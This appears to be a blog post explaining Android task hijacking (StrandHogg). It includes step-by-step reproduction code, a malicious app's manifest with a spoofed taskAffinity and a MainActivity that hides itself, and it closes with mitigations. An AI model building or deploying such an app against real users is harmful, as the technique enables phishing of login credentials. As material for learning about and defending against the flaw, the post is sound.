Task Hijacking in Android

Ashirkul
3 min readMar 22, 2023

--

This is a screen hijacking method that affects the applications running on Android devices. To understand this we have to learn some basic concepts such as -

  1. Task : From user’s perspective one can simply say that each application is a task. However from android perspective things are little different. Android allows multiple application to be part of single task. By official definition “A task is a collection of activities that users interact with when trying to do something in your app”.
  2. Backstack : These activities are arranged in a stack “the backstack” in the order in which each activity is opened. Consider this a a normal stack for activities which pops the top of stack on backpress.

Deep-dive link : https://developer.android.com/guide/components/activities/tasks-and-back-stack#life-cycle

Now lets take an example to under this better.

Suppose you open gmail application and open a mail now you press the link
provided on the mail and chrome browser open's. Though the app is different
now from gmail to chrome but the task are same.

According to the Android security model, all the apps running on the device will be isolated and sandboxed from one another but this is not the case when it comes to the Tasks.
Android allows Activities from different apps to co-reside in the same Task and this is the root cause of the vulnerability. In 2015, at USENIX, task hijacking and its impact on Android were first presented.

Task affinity is an attribute that is defined in each <activity> tag in the AndroidManifest.xml file. It describes which Task an Activity prefers to join. By default, every activity has the same affinity as the package name. We’ll be using this when creating our malware app.

<activity android:taskAffinity=""/>

Launch modes: Launch modes allow you to define how a new instance of an activity is associated with the current task. The work of the launch mode attribute is to specify the instruction on how the activity should be launched in a particular task. There are four different types of launch modes

  1. standard
  2. singleTop
  3. singleTask
  4. singleInstance

Deep-dive link : https://developer.android.com/guide/topics/manifest/activity-element#lmode

How to reproduce the attack ?

  1. Create a new empty project
  2. Define android:taskAffinity=”<main_application_package_name>” in the malicious application’s manifest.
  3. Declare android:launchMode=”singleTask" & android:excludeFromRecents= “true” in activity. This prevents your app to be shown in recent applications.

<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
xmlns:tools="http://schemas.android.com/tools"
package="com.example.hacker_app"
tools:ignore="ExtraText">
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"
tools:ignore="CoarseFineLocation" />
<application
android:allowBackup="true"
android:icon="@mipmap/ic_launcher"
android:label="@string/app_name"
android:roundIcon="@mipmap/ic_launcher_round"
android:supportsRtl="true"
android:theme="@style/Theme.Hacker_app"
android:taskAffinity="com.example.user_application">
<activity android:name=".MainActivity"
android:launchMode="singleTask"
android:excludeFromRecents="true"
android:exported="true"
tools:ignore="WrongManifestParent">
<intent-filter>
<action android:name="android.intent.action.MAIN" />

<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
</application>
</manifest>

4. In your MainActivity of malicious app add moveTaskToBack(true)

public class MainActivity extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState)
{
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
moveTaskToBack(true);
}

@Override public void onResume()
{
super.onResume();
setContentView(R.layout.activity_main);
}
}

Install both applications. Then, he needs to open either before or after opening the vulnerable application. Then, when the vulnerable application is opened, the malicious application will be opened instead. If this malicious application presents the same login as the vulnerable application the user won’t have any means to know that he is putting his credentials in a malicious application. This is also know as StrandHogg vulnerability.

How can we fix this?

  • Set the launchMode to singleInstance which will prevent other activities from becoming a part of it’s task.
  • A custom onBackPressed() function can also be added, to override the default behaviour.
  • Setting taskAffinity="" can be a quick fix for this issue. However keep in mind lot of functionality such as deeplink which uses FLAG_ACTIVITY_NEW_TASK will break.
  • From android 11 and above a fix has been introduced for this vulnerability.

References :

--

--